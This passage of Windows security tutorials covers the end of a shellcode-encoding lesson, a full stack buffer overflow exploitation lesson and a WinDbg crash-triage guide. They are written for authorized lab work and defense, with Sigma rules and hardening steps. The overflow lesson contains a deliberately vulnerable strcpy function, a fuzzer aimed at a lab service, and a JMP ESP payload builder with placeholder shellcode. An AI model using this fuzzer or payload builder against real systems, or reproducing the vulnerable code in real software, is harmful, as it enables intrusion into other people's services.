  • The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
  • Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
  • Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.

Related Tutorials

References

Classic Stack Buffer Overflow: Smashing the Stack on Windows

Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved EIP, and redirects execution through a JMP ESP trampoline — and how /GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.


1. Windows Memory Layout Primer

Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x000000000x7FFFFFFF for user mode. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.

The CPU tracks two stack-relevant registers and one execution register:

  • ESP — stack pointer, the current top of stack.
  • EBP — base/frame pointer, anchors the current frame.
  • EIP — instruction pointer, the address of the next instruction. This is the attacker’s target.

A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.

x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.


2. Anatomy of a Stack Frame

A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:

Stack SlotDescription
Function argumentsPushed by caller before CALL
Saved EIP (return address)Pushed implicitly by the CALL instruction
Saved EBPPushed by callee prologue (PUSH EBP)
/GS stack cookie (if present)Inserted between locals and saved EBP/EIP
Local variables / buffersAllocated by SUB ESP, N
ESP (stack top)Grows downward

The prologue and epilogue, with the /GS cookie check shown, look like this:

; --- Prologue ---
push    ebp                 ; save caller frame pointer
mov     ebp, esp            ; establish new frame
sub     esp, 0x40           ; allocate 64 bytes of locals
mov     eax, [__security_cookie]
xor     eax, ebp            ; cookie ^= EBP (frame-tied canary)
mov     [ebp-4], eax        ; store cookie above locals

; --- Epilogue ---
mov     ecx, [ebp-4]
xor     ecx, ebp
call    __security_check_cookie  ; compare vs master; abort on mismatch
mov     esp, ebp
pop     ebp                 ; restore caller frame pointer
ret                         ; pop saved EIP into instruction pointer

Reading this frame live in WinDbg or x64dbg — inspecting ESP, EBP, and the bytes between locals and the saved return address — is the first skill of exploit development.


Diagram of an x86 Windows stack frame showing the order from high to low address: function arguments, saved return EIP, saved EBP, GS cookie, local buffer, and ESP
A standard x86 cdecl stack frame — the saved return EIP sits just above EBP, making it the prime overwrite target when a local buffer overflows upward.

3. The Overflow: Why Bounds Checks Matter

The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.

IdentifierWhat it does
strcpy, strcat, gets, sprintf, scanfUnsafe CRT functions with no bounds checking — classic root causes
memcpy(dst, src, count)Copies count bytes regardless of dst size; dangerous when count is attacker-controlled

Here is the canonical vulnerable pattern defenders must recognize in code review:

#include <string.h>

// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
    char buffer[64];            // fixed 64-byte stack buffer
    strcpy(buffer, attacker_input);  // no length check — overflow
}

When attacker_input exceeds 64 bytes, the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.

When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.


4. Exploit Development Methodology on Windows

The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:

  1. Fuzz to crash — send increasing-length inputs until the service faults.
  2. Find the offset — send a cyclic (de Bruijn) pattern, read the value in EIP at crash, compute the exact distance to the return address.
  3. Confirm EIP control — overwrite with a known marker (0x42424242) and verify.
  4. Enumerate bad characters — find bytes the protocol mangles (\x00, \x0a, \x0d are common).
  5. Find a trampoline — locate JMP ESP in a non-ASLR module.
  6. Build the payload — padding + trampoline address + NOP sled + shellcode.

A minimal network fuzzer:

import socket, time

target = ("192.168.56.20", 9999)
size = 100
while size < 4000:
    try:
        s = socket.socket()
        s.connect(target)
        buf = b"TRUN /.:/" + b"A" * size      # protocol prefix + payload
        s.send(buf)
        s.close()
        print(f"[+] sent {size} bytes")
        size += 200
        time.sleep(1)
    except Exception:
        print(f"[!] crashed at ~{size} bytes")
        break

Offset discovery with a cyclic pattern (generated by pwntools or !mona pattern_create):

from pwn import cyclic, cyclic_find

pattern = cyclic(3000)                 # de Bruijn sequence
# ... send pattern, read EIP from the debugger at crash (e.g. 0x6f43396e) ...
offset = cyclic_find(0x6f43396e)       # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")

Bad-character enumeration sends the full byte range and diffs it against memory:

badchar_test = bytes(b for b in range(1, 256))   # skip \x00 first
# Send, then in the debugger: d esp  -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.

The final builder assembles the pieces. Note the placeholder shellcode — generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:

from pwn import p32

offset    = 2003
jmp_esp   = 0x625011AF          # FF E4 in a non-ASLR module
nop_sled  = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]"  # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32         # placeholder

payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcode

The key opcodes you search modules for:

Opcode bytesInstructionUse
FF E4JMP ESPClassic return trampoline
FF D4CALL ESPEquivalent effect
FF E5JMP EBPWhen EBP points near the buffer
EB 06Short JMP +6Next-SEH jump-over gadget

Because ESP points at the attacker’s buffer when RET executes, returning into JMP ESP immediately pivots execution into the NOP sled and shellcode.


Flow diagram of the six-step Windows stack overflow exploit development methodology from fuzzing through payload construction
The exploit development loop progresses from controlled crash to precise EIP hijack, terminating in a JMP ESP trampoline payload that pivots into a NOP sled and shellcode.

5. Windows Mitigations Deep-Dive

Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.

MitigationMechanismBypass vector (teaching)
/GS (stack cookie)Random DWORD cookie between locals and saved EBP/EIP; checked in epilogueSEH overwrite before the cookie check; cookie leak
SafeSEHPE table of valid SEH handlers; loader validates the handler before dispatchTrampoline in a module not compiled /SAFESEH
SEHOPValidates the SEH chain reaches FinalExceptionHandler at dispatchChain spoofing; non-opted-in modules
DEP/NX (/NXCOMPAT)Pages are W^X; the stack is non-executableROP chain (follow-on topic)
ASLR (/DYNAMICBASE)Randomizes image/stack/heap basePartial overwrites, info leaks (follow-on topic)

/GS computes a program-wide master cookie at startup via __security_init_cookie(), stored in the module’s .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.

The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.


Hierarchy diagram of Windows stack overflow mitigations including GS cookie, SafeSEH, SEHOP, DEP, and ASLR with compiler versus OS grouping
Windows layers compiler-enforced mitigations (/GS, SafeSEH) with OS-level controls (SEHOP, DEP, ASLR) — each targets a distinct stage of the exploit chain.

6. SEH-Based Overflow (x86)

On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:

typedef struct _EXCEPTION_REGISTRATION_RECORD {
    struct _EXCEPTION_REGISTRATION_RECORD *Next;   // next handler in chain
    PEXCEPTION_ROUTINE                     Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;

When a function uses try/except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler — bypassing the cookie entirely.

The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. At dispatch, the stack arrangement places a pointer to the Next SEH field where RET lands; POP–POP–RET unwinds two slots and returns into the attacker’s Next SEH value, which is typically a short jump (EB 06) over the handler bytes into the shellcode.

SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (default since Vista SP1) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.


Flow diagram showing the SEH-based stack overflow attack chain from buffer overflow through exception dispatch, POP-POP-RET gadget, and short jump into shellcode
Overwriting the SEH record and triggering an exception before the /GS epilogue runs lets attackers bypass the stack cookie entirely via a POP–POP–RET trampoline.

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary

Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:

  1. No-protections build: Compile with /GS- /NXCOMPAT:NO /DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirm EIP control, enumerate bad chars, locate JMP ESP with mona.py, and land in a NOP sled.
  2. /GS-only build: Recompile with /GS enabled, replay the same payload, and watch __security_check_cookie detect the corrupted canary and terminate the process via __report_gsfailure() — the same input that worked now dies in the epilogue.

Reference debugger and mona.py commands:

0:000> g                      ; run until crash
0:000> r                      ; read registers — expect EIP = 41414141
0:000> d esp                  ; dump stack at ESP — find your buffer
0:000> !exploitable           ; triage the crash classification
0:000> bp 0x625011AF          ; break on the JMP ESP trampoline
!mona findmsp                          ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d"   ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00"            ; generate byte array for badchar diffing

8. Common Attacker Techniques

TechniqueDescription
Linear stack smashOverflow a buffer to overwrite saved EIP with a JMP ESP trampoline
SEH overwriteOverwrite Next SEH + SE Handler, trigger an exception to bypass /GS
Non-SafeSEH trampolineSource POP–POP–RET / JMP ESP gadgets from modules lacking /SAFESEH
Bad-char-safe encodingEncode shellcode to avoid protocol-mangled bytes (\x00, \x0a, \x0d)
Egghunter / stagingUse a small first-stage to locate or download a larger payload
Post-exploit VirtualProtectMark injected memory executable to evade software DEP in legacy scenarios

In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.


9. Defensive Strategies & Detection

Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.

  • WER Event ID 1000 (Application Error, Application log) — logs the faulting module, ExceptionCode = 0xC0000005 (access violation), faulting offset, and thread ID. A 0xC0000005 at a non-canonical offset in a network-facing service is high-fidelity.
  • WER Event ID 1001 — records the crash bucket and any captured dump.

Relevant Sysmon events for follow-on activity:

Event IDNameRelevance
1Process CreationShells/payloads spawned from a crashed service
3Network ConnectionReverse-shell / C2 egress from shellcode
7Image LoadedUnexpected ws2_32.dll load by a non-network service
8CreateRemoteThreadThread injection by shellcode
10Process AccessShellcode calling OpenProcess on lsass.exe
11File CreatedDropped payloads / second-stage binaries
25Process TamperingProcess hollowing following the overflow

Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.

A conceptual Sigma rule keying on repeated crashes of a network-facing service:

title: Repeated Application Crash on Network-Facing Service
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    Application|contains: 'vulnservice.exe'
    ExceptionCode: '0xc0000005'
  condition: selection | count() > 3 by Application within 1m
falsepositives:
  - Legitimate software bugs
level: medium
tags:
  - attack.initial_access
  - attack.T1190

Hardening Steps

  1. Force WDEG / Exploit Protection on network-facing services — mandatory DEP, force-ASLR, SEHOP, heap-spray protection via Set-ProcessMitigation.
  2. Build with /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT and audit your pipeline for them.
  3. Verify SEHOPHKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0.
  4. Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
  5. Use AddressSanitizer (/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes.
  6. Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
  7. Run services least-privilege so successful exploitation yields minimal access.

10. Tools for Stack Overflow Analysis

ToolDescriptionLink
WinDbgKernel/user debugger; !exploitable crash triagemicrosoft.com
x64dbgUser-mode debugger for live frame inspectionx64dbg.com
mona.pyImmunity/WinDbg plugin for offsets, trampolines, bad charsgithub.com
pwntoolsPython exploit-dev framework (cyclic, p32)pwntools.com
ROPgadgetGadget discovery for DEP-bypass chainsgithub.com
GhidraStatic disassembly / decompilation for code reviewghidra-sre.org
SysmonEndpoint telemetry for post-exploitation behaviormicrosoft.com

11. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Exploit Public-Facing ApplicationT1190WER EventID 1000 crash bursts; WAF oversized-input alerts
Exploitation for Privilege EscalationT1068Service running as SYSTEM crashing then spawning children
Exploitation for Client ExecutionT1203Client app (parser/player) crash + child process via Sysmon EventID 1
Endpoint DoS: Application ExploitationT1499.004Repeated crash/restart loops (4689, WER 1000)
Exploit Protection (mitigation)M1050DEP/ASLR/SEHOP//GS enforced via WDEG telemetry

Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.


Summary

  • A classic stack buffer overflow overwrites the saved return address to hijack EIP and pivot execution into attacker-controlled shellcode via a JMP ESP trampoline.
  • The x86 frame places locals, an optional /GS cookie, saved EBP, and the return EIP in a predictable order that linear overwrites exploit.
  • /GS inserts a stack canary checked in the epilogue, but does not protect SEH records — the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.
  • DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
  • Detect via WER Event ID 1000 (0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG, /GS /SAFESEH /DYNAMICBASE /NXCOMPAT, SEHOP, and least privilege.

Related Tutorials

References

WinDbg Crash Course: Navigation, Commands, and Workflow for Exploit Devs

Objective: Learn to drive WinDbg against a crashing Windows target — configure symbols, attach in all three modes, read a fault from first principles, master every breakpoint type, inspect the heap, and use the dx data model and Time Travel Debugging — so you can triage crashes and build the workflow exploitation labs depend on.


1. WinDbg Classic vs. WinDbg Preview — Choosing Your Tool

Two editions share the same dbgeng.dll engine but differ in shell and capabilities.

FeatureWinDbg ClassicWinDbg Preview (WinDbgX)
DistributionWindows SDK / WDKMicrosoft Store (UWP)
Layout modelWorkspace .wsp filesModern ribbon UI
Time Travel DebuggingNoYes
Underlying enginedbgeng.dlldbgeng.dll

Use WinDbg Preview as your daily driver — the ribbon, source overlay, and Time Travel Debugging (TTD) make crash triage faster. Keep Classic available for headless scripting on stripped-down lab VMs where the Store runtime is unavailable. Kernel debugging over serial/network (bcdedit /debug on) is a separate discipline; this tutorial stays user-mode.


2. Symbol Configuration Done Right

Without symbols, every other command degrades to raw addresses. A PDB (.pdb) file maps human-readable source elements — function names, struct layouts, locals — to addresses in the compiled binary. Symbols are generated at build/link time.

Set the symbol path before you launch via the _NT_SYMBOL_PATH environment variable, or in-session with .sympath.

0:000> .sympath cache*C:\Symbols;srv*https://msdl.microsoft.com/download/symbols
0:000> .reload /f
0:000> lm

.reload loads symbols lazily; .reload /f forces immediate load. When a module shows (deferred) or (export symbols) in lm, symbol resolution failed. Diagnose with !sym noisy, which prints every path the loader probes, then silence it with !sym quiet.

CommandPurpose
.sympathDisplay / set / append the symbol path
.reload /fForce immediate symbol load
!sym noisyVerbose symbol-loader trace
lmList modules and symbol-load state
x module!patternResolve a symbol name to an address
ln addressFind the nearest named symbol to an address

3. Attaching to a Target: Three Modes

ModeHowUse case
Launchwindbg.exe target.exeDebug from process start
Attachwindbg.exe -p <PID>Inspect a running process
Open dumpwindbg.exe -z crash.dmpPost-mortem analysis

On launch and attach the debugger stops at an initial break before user code runs. The exception model is two-stage: the debugger sees a first-chance exception first, and only if the target’s own handlers do not resolve it does the second-chance exception fire. Control which exceptions break execution with sxe (enable / break), sxd (disable), and sxi (ignore).

0:000> sxe av          ; break on first-chance access violations
0:000> sxe ld:user32   ; break when user32 loads
0:000> g

The sxe ld / g idiom is the canonical way to break exactly when a target module maps into the address space — essential for setting breakpoints on code that is not yet present.


Flowchart showing the two-stage Windows exception dispatch model — first-chance exception goes to WinDbg, then to target SEH handlers, and if unhandled, a second-chance exception breaks the debugger.
WinDbg sees every exception twice: first-chance before target handlers run, second-chance if none resolve it.

4. The Essential Command Vocabulary

Execution control, register/stack inspection, and memory display form the core loop.

CommandWhat it does
g (F5)Continue execution of the debuggee
p / tStep over / step into
guExecute until the current function returns
pt / wtStep to next ret / trace-and-watch a call tree
rDisplay all general-purpose registers
k / kb / kpStack trace; kb adds first 3 args; kp adds typed parameters
lm / u / ufList modules / disassemble / disassemble full function

Memory display and edit commands follow a consistent type-suffix grammar:

CommandWhat it does
db / dw / dd / dqDisplay bytes / words / DWORDs / QWORDs
da / duDisplay ASCII / Unicode string
dp / dvDisplay pointer-sized values / local variables
dt module!Type [addr]Dump a typed struct (e.g. dt ntdll!_PEB @$peb)
!peb / !tebDump the Process / Thread Environment Block
eb / ew / ed / eqEdit byte / word / DWORD / QWORD
ea / euWrite ASCII / Unicode characters to an address
s -d start end valueSearch memory for a pattern over a range
!addressShow virtual mapping, permissions, and region type

A typical inspection sequence at a fault reads registers, walks the stack, then dumps memory at the stack pointer:

0:000> r
0:000> k
0:000> dd esp L8
0:000> dt ntdll!_EXCEPTION_RECORD @$exr

5. Crash Triage: Reading a Fault from First Principles

When a target faults, the debugger lands on the faulting instruction with an exception record describing the cause. !analyze -v automates first-pass triage, emitting the faulting IP, the decoded exception, the stack, and a probable root cause.

0:000> !analyze -v
FAULTING_IP:
 vuln!process_packet+0x4a
0040124a 8801            mov     byte ptr [ecx],al
EXCEPTION_RECORD:  (.exr -1)
ExceptionCode: c0000005 (Access violation)
ExceptionAddress: 0040124a
EXCEPTION_PARAMETER[1]: 41414141     ; attacker-controlled write target
STACK_TEXT:
0019f7c0 41414141 41414141 41414141 vuln!process_packet+0x4a

Read it methodically: FAULTING_IP is the instruction that trapped; the [ecx] write target of 41414141 (“AAAA”) signals attacker-controlled memory. A corrupted STACK_TEXT full of 41414141 indicates a saved-return-address overwrite. Decode any NTSTATUS with !error 0xC0000005. The MSEC !exploitable extension applies heuristics to estimate exploitability classification — load it with .load msec.dll first.

For Structured Exception Handler overwrites, !exchain walks the handler chain:

0:000> !exchain
0019ffdc: 41414141     ; handler overwritten with attacker bytes
Invalid exception stack at 41414141

A handler pointer of 41414141 confirms an SEH overwrite primitive.


Diagram mapping the crash triage workflow from access violation through !analyze -v, faulting IP inspection, stack corruption detection, SEH chain walking, and final exploitability classification.
A structured triage flow turns a raw access violation into a root-caused, exploitability-classified crash record.

6. Breakpoint Mastery

WinDbg distinguishes software breakpoints (bp, patch an int 3) from hardware breakpoints (ba, debug registers — they trap reads/writes/executes without modifying code).

CommandWhat it does
bp module!funcSoftware breakpoint, resolved immediately
bu module!funcUnresolved — arms when the module loads
bm module!pattern*Breakpoint on all symbols matching a pattern
ba r4 addrHardware breakpoint: read 4 bytes (ba e1 = execute, ba w4 = write)
bp /1 addrOne-shot breakpoint, auto-clears after firing
bl / bd N / be N / bc *List / disable / enable / clear all breakpoints

Attach a command string that runs automatically on each break, chaining with ;:

0:000> bu kernel32!WriteFile "k; r eax; g"
0:000> ba w4 0019f7c0 "!address @rip; g"

Use hit-count throttling to avoid output floods on hot paths, and dx query expressions for true conditional breakpoints:

0:000> bp /5 `vuln!net.c:385` "!teb; k; g"
0:000> bp /w "dx ((int)@ecx) == 0x41414141" vuln!process_packet

The bp /w form breaks only when the expression evaluates true — far cheaper than breaking and manually re-continuing.


7. Heap Internals Inspection

Heap corruption — use-after-free, overflow into adjacent chunks — is where most modern exploitation lives. The !heap extension family exposes chunk headers and allocation state.

CommandWhat it does
!heap -sSummary of all heaps
!heap -flt s 0x80Show all allocations of size 0x80
!heap -p -allWalk all allocations in all heaps
!heap -lDetect leaked heap blocks
0:000> !heap -s
0:000> !heap -flt s 0x80      ; isolate chunks of a target size class
0:000> !heap -p -all          ; correlate chunks to allocation call sites

Filtering by size class isolates the chunks an attacker grooms; !heap -p -all ties each block back to its allocation stack, which is how you identify the object straddling a corrupted boundary.


8. The dx Data Model and Scripting

The dx (Debugger Object Model) command exposes debugger state as queryable objects with a LINQ-style syntax — ideal for filtering large outputs and building conditions.

0:000> dx @$curprocess.Modules
0:000> dx @$curthread.Stack.Frames.Select(f => f.Attributes.InstructionOffset)
0:000> dx Debugger.Utility.Control.ExecuteCommand("k")

Debugger.Utility.Control.ExecuteCommand runs any legacy command from inside a dx query, enabling hybrid scripts that mix object queries with classic extensions. Load JavaScript automation with .scriptload script.js and invoke it with .scriptrun.


9. Time Travel Debugging for Exploit Devs

TTD records a full execution trace you can replay forward and backward, then query as data. It is the single biggest accelerator for root-causing memory corruption, because you can step backward from the crash to the write that caused it. WinDbgX must run as Administrator, and TTD is user-mode only in the current public build.

Recording produces a .run trace file. Open it and navigate with the reverse-execution commands:

CommandWhat it does
!tt 0:0Jump to a trace position (here, rewind to start)
g- / p- / t-Reverse continue / step / trace
dx @$cursession.TTD.Calls("module!func")Query every call to a function across the trace
0:000> !tt 0:0
0:000> dx @$cursession.TTD.Calls("ntdll!RtlAllocateHeap")
0:000> g-     ; reverse-continue to the write that preceded the corruption

The workflow for a heap-corruption case: record to crash, query RtlAllocateHeap/RtlFreeHeap calls to find the freed chunk, set a write watchpoint on it, and g- backward to the exact instruction that wrote out of bounds.


Sequential flow diagram illustrating the TTD heap-corruption triage workflow: record trace to crash, query heap calls, identify freed chunk, set write watchpoint, then reverse-execute to the exact out-of-bounds write.
TTD lets you reverse-execute from the crash back to the exact instruction that corrupted the heap chunk.

10. Automation and Crash Triage Pipelines

For fuzzer integration, drive WinDbg headlessly with -c startup commands and -logo logging. A minimal triage script:

sxe av; g; !analyze -v; .logclose; q

Wrap it from any orchestrator:

import subprocess, re

cmds = 'sxe av; g; !analyze -v; .logclose; q'
subprocess.run(['windbg.exe', '-c', cmds, '-logo', 'out.txt', 'target.exe'])

log = open('out.txt', encoding='utf-8', errors='ignore').read()
m = re.search(r'FAULTING_IP:\s*\n(.+)', log)
print('Fault:', m.group(1).strip() if m else 'no crash')

.logopen / .logclose tee session output to disk for later parsing, turning every fuzzer crash into a structured triage record.


11. Common Attacker Techniques

WinDbg is a defensive and authorized-testing tool, but the APIs it relies on overlap heavily with adversary tradecraft — which is precisely why studying it teaches you the telemetry attackers generate.

TechniqueDescription
Process attachOpenProcess(PROCESS_ALL_ACCESS) + DebugActiveProcess mirror injection-stager behavior
Memory read/writeReadProcessMemory / WriteProcessMemory underpin both debugging and code patching
Module enumerationlm, !peb, !teb mirror malware’s runtime module/OS reconnaissance
Exploitability triage!analyze -v, !exploitable, !exchain are used to weaponize crashes
TTD trace harvesting.run files capture sensitive in-memory data during analysis

An attacker reading LSASS or another process under the same primitives that WinDbg uses generates near-identical handle and memory-access telemetry — so the defender who understands WinDbg understands the indicators.


12. Defensive Strategies & Detection

Debugger activity is observable through process-creation, handle-access, and named-pipe telemetry.

Sysmon Event IDRelevance
Event ID 1 (Process Create)windbg.exe / windbgx.exe launch; command line reveals -p PID attach or -z dump
Event ID 10 (ProcessAccess)Attach yields OpenProcess with GrantedAccess: 0x1fffff; SourceImage is windbg.exe
Event ID 8 (CreateRemoteThread)Debugger-injection / anti-anti-debug patterns
Event ID 17/18 (Pipe Create/Connect)Kernel debugging over \\.\pipe\...

Behavioral indicators for blue teams: windbg.exe -p <PID> on the command line (live attach), presence of dbgsrv.exe / ntsd.exe (remote/headless debug server), msec.dll loaded into a session (active exploitability assessment), and .run TTD trace files written to disk.

A Sigma rule for full-access process attach by a debugger:

title: Debugger Full-Access Attach to Process
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    SourceImage|endswith:
      - '\windbg.exe'
      - '\windbgx.exe'
    GrantedAccess: '0x1fffff'
  condition: selection
level: medium

Pair Sysmon with the Microsoft-Windows-Kernel-Process ETW provider and Security Event 4688 (enable Audit Process Creation with command-line capture). Restrict SeDebugPrivilege on production hosts so non-admins cannot attach to other users’ or SYSTEM processes, and never expose kernel-debug ports on networked machines.

MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Native APIT1106EDR hooks on OpenProcess / ReadProcessMemory
Process InjectionT1055Sysmon Event ID 10, GrantedAccess masks
Process Injection: DLL InjectionT1055.001LdrLoadDll / .load activity in traces
Debugger EvasionT1622IsDebuggerPresent / heap-flag / timing probes
OS Credential DumpingT1003Handle access to lsass.exe (authorized DFIR only)
System Information DiscoveryT1082!peb / !teb / lm-equivalent runtime recon

13. Tools for WinDbg Analysis

ToolDescriptionLink
WinDbg PreviewModern debugger with TTDmicrosoft.com
WinDbg ClassicSDK/WDK debugger for headless scriptingmicrosoft.com
Process HackerLive handle / memory inspectionprocesshacker.sourceforge.io
Process MonitorFile / registry / process tracinglive.sysinternals.com
x64dbgUser-mode disassembler-debuggerx64dbg.com
GhidraStatic reverse engineeringghidra-sre.org
VolatilityMemory-forensics frameworkvolatilityfoundation.org
msec.dll (!exploitable)Heuristic exploitability triageMSEC release

14. Summary

  • WinDbg is the exploit developer’s primary lens into a faulting Windows process — and mastering it means mastering the telemetry attackers generate.
  • Correct symbol configuration (.sympath, .reload /f, !sym noisy) is the prerequisite that makes every other command meaningful.
  • !analyze -v, !exchain, and !heap turn a raw access violation into a root-caused, classified crash; dx queries and TTD let you step backward to the exact corrupting write.
  • Master all breakpoint types — bp, bu, bm, hardware ba, one-shot /1, command and dx-conditional breaks — to control execution precisely.
  • Detect debugger and attach activity via Sysmon Event ID 1 and 10 (GrantedAccess: 0x1fffff), Event 4688 command-line auditing, and restricted SeDebugPrivilege on production hosts.

Related Tutorials

References